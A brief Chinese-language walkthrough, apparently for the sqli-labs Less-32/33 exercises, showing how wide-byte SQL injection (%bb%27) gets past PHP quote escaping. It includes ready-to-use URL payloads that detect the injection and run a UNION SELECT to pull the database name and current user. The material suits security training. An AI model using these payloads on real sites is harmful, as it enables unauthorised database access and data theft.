0x01 判断注入点

宽字节注入，过滤掉'(使用php函数将'转义)
输入',"都显示正常
判断宽字节注入

?id=1%bb%27

或者

?id=1%bb%5c%5c%27--+

0x02判断数据库名

后面就正常注入

?id=-1%bb%5c%5c%27 union select 1,database(),user()--+

0x03 Less-33

33关同样的方法绕过

?id=1%bb%27--+

?id=0%bb%5c%5c%27 union select 1,database(),user()--+